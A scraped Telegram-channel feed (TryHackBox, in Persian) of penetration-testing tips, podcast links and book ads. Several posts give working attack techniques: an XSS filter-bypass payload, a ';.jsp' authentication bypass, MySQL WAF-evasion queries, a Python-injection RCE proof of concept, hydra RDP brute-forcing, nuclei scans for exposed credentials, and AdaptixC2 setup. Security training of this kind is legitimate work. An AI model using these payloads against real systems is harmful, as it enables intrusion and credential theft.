Box","url":"https://telemetr.io/uk/channels/1218408024-tryhackbox","image":"https://img.tlmtr.io/c/1ksjAk/6046249694691789995?ty=x"},"commentCount":0,"interactionStatistic":[{"@type":"InteractionCounter","interactionType":"https://schema.org/ViewAction","userInteractionCount":1580},{"@type":"InteractionCounter","interactionType":"https://schema.org/LikeAction","userInteractionCount":3},{"@type":"InteractionCounter","interactionType":"https://schema.org/ShareAction","userInteractionCount":12}]}},{"@type":"ListItem","position":16,"item":{"@type":"SocialMediaPosting","@id":"https://telemetr.io/uk/channels/1218408024-tryhackbox/posts/2888","url":"https://telemetr.io/uk/channels/1218408024-tryhackbox/posts/2888","mainEntityOfPage":"https://telemetr.io/uk/channels/1218408024-tryhackbox/posts/2888","headline":"🔖 راهنما و چک لیست تست نفوذ @TryHackBox #چک_لیست #تست_نفوذ","articleBody":"🔖 راهنما و چک لیست تست نفوذ \n\n@TryHackBox\n#چک_لیست #تست_نفوذ","datePublished":"2025-11-18T09:56:01Z","dateModified":"2025-11-18T09:56:01Z","author":{"@type":"Organization","name":"Try Hack Box","url":"https://telemetr.io/uk/channels/1218408024-tryhackbox","image":"https://img.tlmtr.io/c/1ksjAk/6046249694691789995?ty=x"},"publisher":{"@type":"Organization","name":"Try Hack Box","url":"https://telemetr.io/uk/channels/1218408024-tryhackbox","image":"https://img.tlmtr.io/c/1ksjAk/6046249694691789995?ty=x"},"commentCount":1,"interactionStatistic":[{"@type":"InteractionCounter","interactionType":"https://schema.org/ViewAction","userInteractionCount":1809},{"@type":"InteractionCounter","interactionType":"https://schema.org/LikeAction","userInteractionCount":4},{"@type":"InteractionCounter","interactionType":"https://schema.org/ShareAction","userInteractionCount":102},{"@type":"InteractionCounter","interactionType":"https://schema.org/CommentAction","userInteractionCount":1}]}},{"@type":"ListItem","position":17,"item":{"@type":"SocialMediaPosting","@id":"https://telemetr.io/uk/channels/1218408024-tryhackbox/posts/2887","url":"https://telemetr.io/uk/channels/1218408024-tryhackbox/posts/2887","mainEntityOfPage":"https://telemetr.io/uk/channels/1218408024-tryhackbox/posts/2887","headline":"🔐 HTTP -> HTTPS اگر شما یک سرویس داخلی HTTPS دارید، اما لود بالانسر گیت‌وی ورودی یا چیزی مشابه فقط آدرس‌های H…","articleBody":"🔐 HTTP -> HTTPS\nاگر شما یک سرویس داخلی HTTPS دارید، اما  لود بالانسر گیت‌وی ورودی یا چیزی مشابه فقط آدرس‌های HTTP را اجازه می‌دهد، می‌توانید این را با یک فرمان ساده socat دور بزنید. این یک راه‌حل بلندمدت نیست، بلکه یک کیس سریع و موقتی است.\n@TryHackBox \n#نکته‌ها #ابزارها","datePublished":"2025-11-16T17:43:01Z","dateModified":"2025-11-16T17:43:01Z","author":{"@type":"Organization","name":"Try Hack Box","url":"https://telemetr.io/uk/channels/1218408024-tryhackbox","image":"https://img.tlmtr.io/c/1ksjAk/6046249694691789995?ty=x"},"publisher":{"@type":"Organization","name":"Try Hack Box","url":"https://telemetr.io/uk/channels/1218408024-tryhackbox","image":"https://img.tlmtr.io/c/1ksjAk/6046249694691789995?ty=x"},"commentCount":0,"interactionStatistic":[{"@type":"InteractionCounter","interactionType":"https://schema.org/ViewAction","userInteractionCount":2154},{"@type":"InteractionCounter","interactionType":"https://schema.org/LikeAction","userInteractionCount":6},{"@type":"InteractionCounter","interactionType":"https://schema.org/ShareAction","userInteractionCount":29}]}},{"@type":"ListItem","position":18,"item":{"@type":"SocialMediaPosting","@id":"https://telemetr.io/uk/channels/1218408024-tryhackbox/posts/2886","url":"https://telemetr.io/uk/channels/1218408024-tryhackbox/posts/2886","mainEntityOfPage":"https://telemetr.io/uk/channels/1218408024-tryhackbox/posts/2886","headline":"🎙 قسمت اول RadioZeroPod منتشر شد! در این اپیزود رفتیم سراغ یکی از واقعی‌ترین و جنجالی‌ترین پرونده‌های دنیای ه…","articleBody":"🎙 قسمت اول RadioZeroPod منتشر شد!\n\nدر این اپیزود رفتیم سراغ یکی از واقعی‌ترین و جنجالی‌ترین پرونده‌های دنیای هک\n\n هکری به نام Pompompurin که اسمش سال‌ها تو گزارش‌های امنیت سایبری تکرار می‌شد.\nسراغ تحلیل کامل OSINT و Threat Intelligence رفتیم و لایه‌لایه داستانش رو باز کردیم…\n\n🎧 این قسمت رو از اینجا ببینید:\n\nhttps://youtu.be/lAehXOe5tew","datePublished":"2025-11-15T14:21:45Z","dateModified":"2025-11-15T14:21:45Z","author":{"@type":"Organization","name":"Try Hack Box","url":"https://telemetr.io/uk/channels/1218408024-tryhackbox","image":"https://img.tlmtr.io/c/1ksjAk/6046249694691789995?ty=x"},"publisher":{"@type":"Organization","name":"Try Hack Box","url":"https://telemetr.io/uk/channels/1218408024-tryhackbox","image":"https://img.tlmtr.io/c/1ksjAk/6046249694691789995?ty=x"},"commentCount":1,"interactionStatistic":[{"@type":"InteractionCounter","interactionType":"https://schema.org/ViewAction","userInteractionCount":1971},{"@type":"InteractionCounter","interactionType":"https://schema.org/LikeAction","userInteractionCount":7},{"@type":"InteractionCounter","interactionType":"https://schema.org/ShareAction","userInteractionCount":30},{"@type":"InteractionCounter","interactionType":"https://schema.org/CommentAction","userInteractionCount":1}]}},{"@type":"ListItem","position":19,"item":{"@type":"SocialMediaPosting","@id":"https://telemetr.io/uk/channels/1218408024-tryhackbox/posts/2885","url":"https://telemetr.io/uk/channels/1218408024-tryhackbox/posts/2885","mainEntityOfPage":"https://telemetr.io/uk/channels/1218408024-tryhackbox/posts/2885","headline":"The Windows startup process tree. @TryHackBox #شکار_تهدید #ویندوز","articleBody":"The Windows startup process tree.\n\n@TryHackBox \n#شکار_تهدید #ویندوز","datePublished":"2025-11-14T07:40:07Z","dateModified":"2025-11-14T07:40:07Z","author":{"@type":"Organization","name":"Try Hack Box","url":"https://telemetr.io/uk/channels/1218408024-tryhackbox","image":"https://img.tlmtr.io/c/1ksjAk/6046249694691789995?ty=x"},"publisher":{"@type":"Organization","name":"Try Hack Box","url":"https://telemetr.io/uk/channels/1218408024-tryhackbox","image":"https://img.tlmtr.io/c/1ksjAk/6046249694691789995?ty=x"},"commentCount":0,"interactionStatistic":[{"@type":"InteractionCounter","interactionType":"https://schema.org/ViewAction","userInteractionCount":1948},{"@type":"InteractionCounter","interactionType":"https://schema.org/LikeAction","userInteractionCount":9},{"@type":"InteractionCounter","interactionType":"https://schema.org/ShareAction","userInteractionCount":44}]}},{"@type":"ListItem","position":20,"item":{"@type":"SocialMediaPosting","@id":"https://telemetr.io/uk/channels/1218408024-tryhackbox/posts/2884","url":"https://telemetr.io/uk/channels/1218408024-tryhackbox/posts/2884","mainEntityOfPage":"https://telemetr.io/uk/channels/1218408024-tryhackbox/posts/2884","headline":"🔖 پروتکل ریموت دسکتاپ - تست نفوذ RDP پروتکل ریموت دکستاپ RDP پروتکلی است که به کاربر یک رابط گرافیکی ارائه می…","articleBody":"🔖 پروتکل ریموت دسکتاپ - تست نفوذ RDP\n\nپروتکل ریموت دکستاپ RDP پروتکلی است که به کاربر یک رابط گرافیکی ارائه می‌ دهد تا از طریق اتصال شبکه به کامپیوتر دیگری متصل شود. پورت پیش‌ فرض آن ۳۳۸۹ است.\n\nEnumeration\n\nnmap --script rdp-enum-encryption -p 3389 \nnmap --script rdp-ntlm-info -p 3389 \nnmap --script rdp* -p 3389 \nBrute Force Credentials\n\nhydra -l username -P passwords.txt rdp\nhydra -L usernames.txt -p password rdp\nConnect\nRemmina\n\nRemmina :\nیک کلاینت ریپوت دکستاپ برای سیستم‌ عامل‌ های کامپیوتری مبتنی بر POSIX است..\n\n\nremmina : \n\n# -c: Connect given URI or file\nremmina -c rdp://username@vulnerable.com\nremmina -c rdp://domain\\\\username@vulnerable.com\nremmina -c rdp://username:password@vulnerable.com\n\n# ---------------------------------------------------------------------------------\n\n# Settings\n\n# Keyboard mapping\n1. On Remmina client window, click menu icon and move to \"Preferences\".\n2. Navigate to \"RDP\" tab and check \"Use client keyboard mapping\".\n3. Reboot Remmina\n\n\nFreeRDP\n\nxfreerdp /u:username /v:10.0.0.1:3389\nxfreerdp /u:username /p:password /cert:ignore /v:10.0.0.1 /workarea\n# Create a shared drive (/drive:LOCAL_DIR,SHARE_NAME)\nxfreerdp /u:username /p:password /drive:.,share /v:10.0.0.1\n# Useful command for exploiting\nxfreerdp /v:10.0.0.1 /u:username /p:password +clipboard /dynamic-resolution /drive:/usr/share/windows-resources,share\n\n# --------------------------------------------------------------------------------\n\n# On remote Windows\n\n# Access share directory in Command Prompt or PowerShell\n\\\\tsclient\\\\~share\\\n\n\nRdesktop\n\nrdesktop -u username -p password 10.0.0.1:3389\n#RDP \n@KavehOffSec","datePublished":"2025-11-14T04:09:00Z","dateModified":"2025-11-19T05:15:00Z","author":{"@type":"Organization","name":"Try Hack Box","url":"https://telemetr.io/uk/channels/1218408024-tryhackbox","image":"https://img.tlmtr.io/c/1ksjAk/6046249694691789995?ty=x"},"publisher":{"@type":"Organization","name":"Try Hack Box","url":"https://telemetr.io/uk/channels/1218408024-tryhackbox","image":"https://img.tlmtr.io/c/1ksjAk/6046249694691789995?ty=x"},"commentCount":0,"interactionStatistic":[{"@type":"InteractionCounter","interactionType":"https://schema.org/ViewAction","userInteractionCount":751},{"@type":"InteractionCounter","interactionType":"https://schema.org/ShareAction","userInteractionCount":40}],"sharedContent":{"@type":"SocialMediaPosting","datePublished":"2025-11-14T03:52:32Z"}}}]}
هکر مورد علاقه شما کیست؟ 👀

درود دوستان عزیز، امروز خوشحال میشم به شما معرفی کنم که من صفحه لینکدین مجموعه TryHackBox رو مجددا در لینکدین ایجاد کردم که فعالیت آموزشی در زمینه تست نفوذ و ردتیم را داریم. این مجموعه برای همه ی کسانی هست که به تست نفوذ و ردتیم علاقه دارن و می خوان از آموزش ها، راهکارها و تجربیات در این زمینه با هم به اشتراک بذارن. امیدوارم که با همکاری شما، این مجموعه به یه جایی تبدیل بشه که همهی علاقهمندان به امنیت سایبری بتونن ازش استفاده کنن و اطلاعات مفیدی رو ازش بدست بیارن. لطفاً اگه علاقه مندید، به این مجموعه بپیوندید و دنبالش کنید تا از آموزش های ما بهره لازم ببرید لینک مجموعه: https://lnkd.in/dBFp6QJK ممنون از حضور شما و همراهی شما عزیزان . از دوستان علاقه مندان به تولید محتوا و تدریس هم دعوت به همکاری مینماییم در صورت همکاری با مجموعه ما با ما در ارتباط باشید . @THBxSupport

🔖 روش جالب دور زدن sanitization ورودی برای XSS. شما هم متوجه شدید که بیشتر سایت‌ها الان sanitization ورودی رو با بلاک کردن تگ‌ها و ایونت‌های خاص انجام می‌دن، درسته!? نه واقعاً 😅 خب، اول یه نگاهی به چند تگ نمونه که می‌تونن XSS رو فعال کنن بنداز:
script, img, a, iframe, object, video, audio, form, meta
سایت این کلمات کلیدی رو اگر داخل تگ‌هایی مثل < > یا </ > باشن بلاک میکنه و با هیچی (null یا رشته خالی "") جایگزین میکنه. پس اگر پیلود زیر رو امتحان کنی:
<script>alert(1)</script>
تبدیل می‌شه به:
alert(1)
حالا یه کم عمیق‌تر فکر کن چی میشه اگر پیلود رو اینجوری بنویسی:
<script <img>> alert(1) </script </img>>
در این پیلود، به بخش اول دقت کن:
<script <img>>
اینجا <img> یه تگ کامل ایمِیجه و قطعاً توسط فیلتر sanitization حذف میشه. اما <script< چی؟ می‌بینی که تگ <script> هنوز درست نوشته نشده یعنی <script دنبال شده با <، پس دقیقاً با منطق sanitization مچ نمیشه. حالا بخش جالب: وقتی <img> از <script <img>> حذف بشه، چی میمونه؟ <script>! یعنی تبدیل به این صورت می‌شه:
<script <img>> → remove <img> → <script>
</script </img>> → remove </img> → </script>
و در نهایت پیلود معتبر میشه:
<script>alert(1)</script>
@TryHackBox #xss

📖 وایرشارک برای ردتیمرها: از پایه تا پیشرفته 📚 عنوان کتاب: وایرشارک برای ردتیمرها (Wireshark for Red Teamers) این کتاب یک ر
+3
📖 وایرشارک برای ردتیمرها: از پایه تا پیشرفته 📚 عنوان کتاب: وایرشارک برای ردتیمرها (Wireshark for Red Teamers)  این کتاب یک راهنمای جامع و عملی برای یادگیری ابزار قدرتمند Wireshark است، با تمرکز ویژه روی کاربردهای آن در حوزه Red Teaming (تیم قرمز) و امنیت سایبری تهاجمی. کتاب از پایه شروع می‌ کند و به مفاهیم پیشرفته مانند تحلیل ترافیک شبکه، شناسایی آسیب‌پذیری‌ها، و تکنیک‌های نفوذ می‌ پردازد. محتوای اصلی کتاب شامل فصل‌هایی مانند معرفی Wireshark، درک ترافیک شبکه، تکنیک‌های کپچرینگ پکت‌ها، فیلترینگ، و کاربردهای عملی در Reconnaissance (شناسایی) و Command and Control (C2) است. این کتاب مناسب چه کسانی است؟ ویژگی‌ های کتاب ؟ چرا باید این کتاب را بخرید؟ دانلود فایل های تمرین و سناریوها نمونه کتاب توضیحات کامل را بخوانید . 🔥 تخفیف بلک فرایدی 💰 قیمت اصلی: ۲۵۰,۰۰۰ تومان  💥 با ۴۰٪ تخفیف: فقط ۱۵۰,۰۰۰ تومان  ⚠️ مهلت تخفیف: تنها تا روز جمعه ۷ آذرماه!  📌 جهت خرید و کسب اطلاعات بیشتر، به ایدی زیر پیام دهید: @THBxSupport

📚 کتابچه "Mimikatz: تسلط عملی بر تکنیک‌های پیشرفته حملات Active Directory" از مقدماتی تا پیشرفته. اگر در حوزه امنیت سایبری و
+3
📚 کتابچه "Mimikatz: تسلط عملی بر تکنیک‌های پیشرفته حملات Active Directory" از مقدماتی تا پیشرفته. اگر در حوزه امنیت سایبری و تست نفوذ Active Directory فعالیت میکنید، این کتابچه ضروریترین منبعی است که میتوانید داشته باشید! منبعی کامل برای تیم‌های قرمز (Red Team)، شامل دستورات عملی، اسکریپت‌های آماده، و تکنیک‌های evasion است که مستقیماً در تست‌های نفوذ استفاده میشوند. همین حالا این کتاب تخصصی را به زبان فارسی بخوانید. 🔥 تخفیف بلک فرایدی 💰 قیمت اصلی: ۲۵۰,۰۰۰ تومان  💥 با ۴۰٪ تخفیف: فقط ۱۵۰,۰۰۰ تومان  ⚠️ مهلت تخفیف: تنها تا روز جمعه ۷ آذرماه!  📌 جهت خرید و کسب اطلاعات بیشتر، به ایدی زیر پیام دهید: @THBxSupport

🔖 روش دور زدن احراز هویت: 💢 مراحل:
Target..com/carbon/server-admin/memory_info.jsp =
 ریدایرکت به صفحه لاگین [وضعیت ۳۰۱]
``` Target..com/carbon/server-admin/memory_info.jsp;.jsp = محتوای صفحه رو بدون احراز هویت برمیگردونه [وضعیت ۲۰۰] ` پیلود > ;.jsp نکته: مسیرهای حساس رو از فایل‌های JS پیدا کن که نیاز به لاگین دارن. endpointهایی رو پیدا کن که با اکستنشن تموم می‌شن مثل: .php, .jsp, .shtml و غیره. هر endpoint رو با پیلود همون اکستنشن فاز کن: ;.jsp ;.php ;.shtml اگر هر کدوم ۲۰۰ داد، دستی چک کن. ممکنه کار کنه! لایک و اشتراک گذاشتن فراموش نشه @TryHackBox

Repost from P.F.K Security
نصب/اجرای :
sudo apt install mingw-w64 make

wget https://go.dev/dl/go1.24.4.linux-amd64.tar.gz -O /tmp/go1.24.4.linux-amd64.tar.gz
sudo rm -rf /usr/local/go /usr/local/bin/go
sudo tar -C /usr/local -xzf /tmp/go1.24.4.linux-amd64.tar.gz
sudo ln -s /usr/local/go/bin/go /usr/local/bin/go

sudo apt install gcc g++ build-essential cmake libssl-dev qt6-base-dev qt6-websockets-dev qt6-declarative-dev

git clone https://github.com/Adaptix-Framework/AdaptixC2.git
cd AdaptixC2
make server
make extenders
make client
cd dist
chmod +x ssl_gen.sh
./ssl_gen.sh

./adaptixserver -profile profile.json
./AdaptixClient
@PfkSecurity

Repost from P.F.K Security
AdaptixC2 v0.10 رلیز جدید بهترین open-source C2 منتشر شد https://adaptix-framework.gitbook.io/adaptix-framework/blogs UPD 0.1
AdaptixC2 v0.10 رلیز جدید بهترین open-source C2 منتشر شد https://adaptix-framework.gitbook.io/adaptix-framework/blogs UPD 0.10: تغییرات قابلیت ها :
Server/Client Architecture for Multiplayer Support Cross-platform GUI client Fully encrypted communications Listener and Agents as Plugin (Extender) Client extensibility for adding new tools Task and Jobs storage Files and Process browsers Socks4 / Socks5 / Socks5 Auth support Local and Reverse port forwarding support BOF support Linking Agents and Sessions Graph Agents Health Checker Agents KillDate and WorkingTime control Windows/Linux/MacOs agents support Remote Terminal
💻 مخزن 💻 کیت افزونه 📔 مستندات #adaptixc2 #redteam #ردتیم @PfkSecurity

《جشن آذرگان خجسته باد》 «روز آذر از ماه آذر در گاهشمار زرتشتی، برابر با سوم آذرماه در گاهشمار جلالی، جشن آذرگان است. ایرانیان باستان این روز را به برافروختن آتش و جشن و پایکوبی سپری می‌کردند، به آتشکده‌ها می‌رفتند و اهورامزدا را ستایش می‌کردند.» «از میان چهار عنصر آتش، آب، خاک و باد، جایگاه آتش برای ایرانیان، ممتاز بود، زیرا با نور و راستی اهورایی پیوند داشت. ایرانیان با اتکا به همین باور دیرین، هزاران سال جشن‌های آذرگان و سده را که حول محور آتش معنا می‌شوند، برگزار می‌کردند و بر این باور استوار بودند که وقتی می‌گویند «چراغ خانه‌ات خاموش مباد» در واقع آرزو می‌کنند پیوند فرد با نور ایزدی گسسته نشود.» «متون تاریخی و آیینی ایران نشان می‌دهد که برخلاف آنچه برخی ادعا می‌کنند، ایرانیان باستان هرگز آتش‌پرست نبودند، بلکه به باور آنان در واقع این آتش بود که آنها را به نور ایزدی پیوند می‌داد، روشنایی و گرما به جهان می‌بخشید، مظهر روشنایی در برابر تاریکی بود، حقیقت را آشکار و انسان را به بینش و خرد اهورایی نزدیک‌تر می‌کرد و هرگونه ناپاکی را می‌زدود.»

⚡️ قدیمی اما مفید: چند ترفند MySQL برای شکستن بعضی #WAFها SELECT -1e1 FROM test SELECT ~1. FROM test SELECT \N FROM test SELE
⚡️ قدیمی اما مفید: چند ترفند MySQL برای شکستن بعضی #WAFها
SELECT -1e1 FROM test
SELECT ~1. FROM test
SELECT \N FROM test
SELECT @^1. FROM test
SELECT -id-1. FROM test
@TryHackBox #باگ_بانتی #نکته #امنیت_سایبری

🎙 قسمت دوم RadioZeroPod منتشر شد! 💠 جاناتان جیمز داستان هکری که پنتاگون و ناسا را ​​در سن 15 سالگی هک کرد. ✨ از تولد یک کود
🎙 قسمت دوم RadioZeroPod منتشر شد! 💠 جاناتان جیمز داستان هکری که پنتاگون و ناسا را ​​در سن 15 سالگی هک کرد. ✨ از تولد یک کودک تا مرگ یک قهرمان! 🎧 این قسمت رو از اینجا ببینید: https://youtu.be/F7raVUzP3LY #RadioZeroPod

RCE از طریق تزریق کد پایتون: PoC:
{
  "name": "TryHackBox ",
  "args": {},
  "json_schema": {"type": "object", "properties": {}},
  "source_code": "def darkshadow():\n import os\n data='0'.encode('utf-8')\n return ''+os.popen('id').read()"
}
شما واقعاً از خوندن متودولوژی‌ ها لذت می‌برید؟
اگر بیشتر می‌خواید، توی کامنت‌ها نظرتون رو بگید چه تکنیک‌هایی کار کردید...
@TryHackBox #پایتون #rce

🔖 پیدا کردن Low Hanging Fruits با استفاده از Nuclei AI
nuclei -list targets.txt -ai 
💢 پیدا کردن فایل‌ های مدل AI/ML در معرض دید (.pkl, .h5, .pt) که ممکن است الگوریتم‌های اختصاصی یا داده‌ های آموزشی حساس را لو دهند.
nuclei -list targets.txt -ai
💢 پیدا کردن اسکریپت‌ های اتوماسیون در معرض دید (.sh, .ps1, .bat) که ابزارهای داخلی یا اعتبارنامه‌ ها را افشا می‌ کنند.
nuclei -list targets.txt -ai 
💢 شناسایی هدرهای CSP نادرست پیکربندی‌ شده که 'unsafe-inline' یا سورس‌ های وایلدکارت را اجازه می‌دهند.
nuclei -list targets.txt -ai 
💢 تشخیص صفحاتی که توکن‌ های JWT را در URL یا کوکی‌ها لو میدهند.
nuclei -list targets.txt -ai 
💢 شناسایی پیام‌های خطای بیش از حد پرجزئیات که جزئیات فریم‌ ورک یا کتابخانه را افشا می‌کنند.
nuclei -list targets.txt -ai 
💢 پیدا کردن endpointهای برنامه که stack trace یا کد منبع را در معرض دید قرار می‌ دهند.
nuclei -list targets.txt -ai 
💢 پیدا کردن اطلاعات حساس در کامنت‌های HTML (یادداشت‌های دیباگ، کلیدهای API، اعتبارنامه‌ها).
nuclei -list targets.txt -ai 
💢 پیدا کردن فایل‌های .env در معرض دید که اعتبارنامه‌ها، کلیدهای API و پسوردهای دیتابیس را لو می‌دهند.
nuclei -list targets.txt -ai 
💢 پیدا کردن فایل‌های پیکربندی در معرض دید مانند config.json, config.yaml, config.php, application.properties حاوی کلیدهای API و اعتبارنامه‌های دیتابیس.
nuclei -list targets.txt -ai 
💢 پیدا کردن فایل‌های پیکربندی حاوی اطلاعات حساس مانند اعتبارنامه‌ها، کلیدهای API، پسوردهای دیتابیس و سکرت‌های سرویس ابری.
nuclei -list targets.txt -ai 
💢 پیدا کردن فایل‌های پیکربندی دیتابیس مانند database.yml, db_config.php, .pgpass, .my.cnf که اعتبارنامه‌ها را لو می‌دهند.
nuclei -list targets.txt -ai 
💢 پیدا کردن فایل‌ های پیکربندی Docker و Kubernetes در معرض دید مانند docker-compose.yml, kubeconfig, .dockercfg, .docker/config.json حاوی اعتبارنامه‌های ابری و سکرت‌ها.
nuclei -list targets.txt -ai 
💢 پیدا کردن کلیدهای SSH و فایل‌های پیکربندی در معرض دید مانند id_rsa, authorized_keys و ssh_config. nuclei -list targets.txt -ai 💢 پیدا کردن فایل‌های پیکربندی WordPress در معرض دید (wp-config.php) حاوی اعتبارنامه‌های دیتابیس و سکرت‌های احراز هویت nuclei -list targets.txt -ai شناسایی فایل‌های .npmrc و .yarnrc در معرض دید که توکن‌های احراز هویت NPM را لو می‌دهند nuclei -list targets.txt -ai "شناسایی لیست دایرکتوری‌های باز که فایل‌های حساس را در معرض دید قرار می‌دهند" nuclei -list targets.txt -ai "پیدا کردن دایرکتوری‌های .git در معرض دید که اجازه دانلود کامل ریپو را می‌دهند" nuclei -list targets.txt -ai "پیدا کردن ریپوزیتوری‌های .svn و .hg در معرض دید که کد منبع را لو می‌دهند" nuclei -list targets.txt -ai "شناسایی سرورهای FTP باز که دسترسی ناشناس را اجازه می‌دهند" nuclei -list targets.txt -ai "پیدا کردن endpointهای GraphQL با introspection فعال" nuclei -list targets.txt -ai "شناسایی دایرکتوری‌های .well-known در معرض دید که داده‌های حساس را افشا می‌کنند" nuclei -list targets.txt -ai "پیدا کردن صفحات phpinfo() عمومی که جزئیات محیط را لو می‌دهند" nuclei -list targets.txt -ai "پیدا کردن داکیومنت‌های Swagger, Redocly, GraphiQL و API Blueprint در معرض دید" nuclei -list targets.txt -ai "شناسایی دایرکتوری‌های .vscode و .idea در معرض دید که پیکربندی‌های توسعه‌دهنده را لو می‌دهند" nuclei -list targets.txt -ai "تشخیص آدرس‌های IP داخلی (10.x.x.x, 192.168.x.x و غیره) در پاسخ‌های HTTP" nuclei -list targets.txt -ai "پیدا کردن فایل‌های debug.log وردپرس در معرض دید که اعتبارنامه‌ها و پیام‌های خطا را لو می‌دهند"
nuclei -list targets.txt -ai 
💢 تشخیص CORS پیکربندی که originهای وایلدکارت ('*') را اجازه می‌دهد.
nuclei -list targets.txt -ai
💢 پیدا کردن فایل‌ های بک‌آپ و لاگ عمومی (.log, .bak, .sql, .zip, .dump).
nuclei -list targets.txt -ai
💢 پیدا کردن پنل‌ های ادمین در معرض دید با اعتبارنامه‌های پیش‌ فرض.
nuclei -list targets.txt -ai
💢 شناسایی endpointهای API رایج که داده‌های حساس کاربر را برمی‌ گردانند و وضعیت HTTP 200 OK می‌ دهند.
nuclei -list targets.txt -ai
💢 تشخیص برنامه‌های وب که در حالت دیباگ اجرا میشوند و ممکن است اطلاعات حساس سیستم را در معرض دید قرار دهند. @TryHackBox

⭕️ دیگر کانال ها و شبکه های اجتماعی ما را دنبال کنید : دوستان به علت مسدود شدن کانال ها توسط تلگرام که این روزا زیاد شده از شما میخواهیم در کانال های دیگر ما و شبکه های اجتماعی همراه ما باشید : 💠 کانال های تلگرام ما : 🔶 آموزش تست نفوذ و Red Team 🆔 @TryHackBox 🔶 رودمپ های مختلف 🆔 @TryHackBoxOfficial 🔶 داستان های هک 🆔 @TryHackBoxStory 🔶 آموزش برنامه نویسی 🆔 @TryCodeBox 🔶 رادیو زیروپاد ( پادکست ها ) 🆔 @RadioZeroPod ➖➖➖➖➖➖➖➖➖➖➖➖➖➖➖➖ 👥 گروه های پرسش و پاسخ 🔷 هک و امنیت 🆔 @TryHackBoxGroup 🔷 برنامه نویسی 🆔 @TryCodeBoxGroup ➖➖➖➖➖➖➖➖➖➖➖➖➖➖➖➖ 🔴 اینستاگرام : 🔗 http://www.instagram.com/TryHackBox 🔵 یوتیوب : 🔗 https://youtube.com/@tryhackbox 🟠 گیت هاب ما : 🔗 https://github.com/TryHackBox/

🔖 راهنما و چک لیست تست نفوذ @TryHackBox #چک_لیست #تست_نفوذ

🔐 HTTP -> HTTPS اگر شما یک سرویس داخلی HTTPS دارید، اما لود بالانسر گیت‌وی ورودی یا چیزی مشابه فقط آدرس‌های HTTP را اجازه می
🔐 HTTP -> HTTPS اگر شما یک سرویس داخلی HTTPS دارید، اما  لود بالانسر گیت‌وی ورودی یا چیزی مشابه فقط آدرس‌های HTTP را اجازه می‌دهد، می‌توانید این را با یک فرمان ساده socat دور بزنید. این یک راه‌حل بلندمدت نیست، بلکه یک کیس سریع و موقتی است. @TryHackBox #نکته‌ها #ابزارها

🎙 قسمت اول RadioZeroPod منتشر شد! در این اپیزود رفتیم سراغ یکی از واقعی‌ترین و جنجالی‌ترین پرونده‌های دنیای هک هکری به نام P
🎙 قسمت اول RadioZeroPod منتشر شد! در این اپیزود رفتیم سراغ یکی از واقعی‌ترین و جنجالی‌ترین پرونده‌های دنیای هک هکری به نام Pompompurin که اسمش سال‌ها تو گزارش‌های امنیت سایبری تکرار می‌شد. سراغ تحلیل کامل OSINT و Threat Intelligence رفتیم و لایه‌لایه داستانش رو باز کردیم… 🎧 این قسمت رو از اینجا ببینید: https://youtu.be/lAehXOe5tew

The Windows startup process tree. @TryHackBox #شکار_تهدید #ویندوز

Repost from
🔖 پروتکل ریموت دسکتاپ - تست نفوذ RDP پروتکل ریموت دکستاپ RDP پروتکلی است که به کاربر یک رابط گرافیکی ارائه می‌ دهد تا از طریق اتصال شبکه به کامپیوتر دیگری متصل شود. پورت پیش‌ فرض آن ۳۳۸۹ است. Enumeration
nmap --script rdp-enum-encryption -p 3389 <target-ip>
nmap --script rdp-ntlm-info -p 3389 <target-ip>
nmap --script rdp* -p 3389 <target-ip>
Brute Force Credentials
hydra -l username -P passwords.txt <target-ip> rdp
hydra -L usernames.txt -p password <target-ip> rdp
Connect Remmina Remmina : یک کلاینت ریپوت دکستاپ برای سیستم‌ عامل‌ های کامپیوتری مبتنی بر POSIX است.. remmina :
# -c: Connect given URI or file remmina -c rdp://username@vulnerable.com remmina -c rdp://domain\\username@vulnerable.com remmina -c rdp://username:password@vulnerable.com # --------------------------------------------------------------------------------- # Settings # Keyboard mapping 1. On Remmina client window, click menu icon and move to "Preferences". 2. Navigate to "RDP" tab and check "Use client keyboard mapping". 3. Reboot Remmina
FreeRDP
xfreerdp /u:username /v:10.0.0.1:3389 xfreerdp /u:username /p:password /cert:ignore /v:10.0.0.1 /workarea # Create a shared drive (/drive:LOCAL_DIR,SHARE_NAME) xfreerdp /u:username /p:password /drive:.,share /v:10.0.0.1 # Useful command for exploiting xfreerdp /v:10.0.0.1 /u:username /p:password +clipboard /dynamic-resolution /drive:/usr/share/windows-resources,share # -------------------------------------------------------------------------------- # On remote Windows # Access share directory in Command Prompt or PowerShell \\tsclient\\~share\
Rdesktop
rdesktop -u username -p password 10.0.0.1:3389
#RDP @KavehOffSec